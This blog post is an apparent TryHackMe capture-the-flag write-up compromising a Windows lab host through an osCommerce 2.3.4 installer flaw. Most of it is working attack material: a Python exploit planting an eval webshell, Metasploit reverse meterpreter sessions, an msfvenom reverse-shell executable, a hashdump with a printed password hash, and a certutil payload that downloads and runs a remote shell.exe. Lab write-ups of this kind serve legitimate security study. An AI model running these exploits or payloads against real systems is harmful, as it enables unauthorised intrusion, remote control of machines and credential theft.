[Tryhackme] Blueprint(RCE attack)

Posted by fiddler80 on Wed, 17 Nov 2021 12:18:16 +0100


The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.

Service detection

└─# nmap -sV -Pn    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 03:34 EST
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 69.23% done; ETC: 03:37 (0:00:29 remaining)
Nmap scan report for
Host is up (0.47s latency).
Not shown: 987 closed ports
80/tcp    open  http         Microsoft IIS httpd 7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.68 seconds

Service analysis

You can see that three http services, one shared service and several rpc services are opened

The browser opens port 80 and port 443 services in turn, and an error is reported on the home page.

The 8080 service shows a web app called oscommerce, version 2.3.4

Search kali for vulnerabilities in this web app:

└─# searchsploit oscommerce 2.3.4
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities                                                                                                                                                               | php/webapps/34582.txt
osCommerce - 'currency' SQL Injection                                                                                                                                                             | php/webapps/46328.txt
osCommerce - 'products_id' SQL Injection                                                                                                                                                          | php/webapps/46329.txt
osCommerce - 'reviews_id' SQL Injection                                                                                                                                                           | php/webapps/46330.txt
osCommerce - 'title' Persistent Cross-Site Scripting                                                                                                                                              | php/webapps/49103.txt
osCommerce - Arbitrary File Upload                                                                                                                                                                | php/webapps/43191.py
osCommerce - Remote Code Execution                                                                                                                                                                | php/webapps/44374.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

It can be said that it is full of vulnerabilities, including sql injection, file upload, remote code execution, etc.


We copy the remote code execution attack script locally. After testing, the target system php disables the system function, but the passthru function can be used.

We enter whoami

Echo as: nt authority\system

nice, direct maximum permission.

I've been stuck here for a long time because I can't bounce shell directly to my kali with powershell.

Later, I had to change my thinking. Since I can't rebound, I can write a sentence directly. Fortunately, the eval function can also be used. The attack code is modified as follows:

import requests

base_url = ""
target_url = ""

data = {

payload = '\');'
payload += """eval(@$_POST['cmd']);""" 
payload += '/*'

data['DB_DATABASE'] = payload

r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
    print("[-] Exploit did not execute as planned")

After executing the above attack script. Go to msf to find the Chinese kitchen knife module and fill in the parameters:

msf6 exploit(multi/http/caidao_php_backdoor_exec) > options

Module options (exploit/multi/http/caidao_php_backdoor_exec):

   Name       Current Setting                                           Required  Description
   ----       ---------------                                           --------  -----------
   PASSWORD   cmd                                                       yes       The password of backdoor
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080                                                      yes       The target port (TCP)
   SSL        false                                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /oscommerce-2.3.4/catalog/install/includes/configure.php  yes       The path of backdoor
   VHOST                                                                no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Attack, get the initial shell and view the highest system permissions:

msf6 exploit(multi/http/caidao_php_backdoor_exec) > run

[*] Started reverse TCP handler on 
[*] Sending exploit...
[*] Sending stage (39282 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-11-17 04:10:33 -0500

meterpreter > getuid
Server username: SYSTEM (0)

The problem is that the kitchen knife module does not have the hashdump command, so we have to compile another fully functional payload

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4242 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

After uploading to the target, execute:

meterpreter > upload /root/tryhackme/Blueprint/reverse.exe
[*] uploading  : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] uploaded   : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
meterpreter > execute -f reverse.exe
Process 4668 created.

Get a fully functional shell in another msf:

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     yes       The listen address (an interface may be specified)
   LPORT     4242             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-11-17 04:39:12 -0500

meterpreter > hashdump

Get the section 30e87bf999828446a1c1209ddde4c450 of the lab hash password above This website Crack the plaintext password.

Get root.txt

meterpreter > pwd
meterpreter > ls
Listing: C:\Users\Administrator\Desktop

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-04-11 18:36:47 -0400  desktop.ini
100666/rw-rw-rw-  37    fil   2019-11-27 13:15:37 -0500  root.txt.txt


According to the boss's article, the payload below the attack stage can upload files from the attack aircraft to the target aircraft. Record it here:

payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil.exe -urlcache -split -f shell.exe & shell.exe & nslookup test ");' 
payload += 'echo $var;'
payload += '/*'

Topics: CTF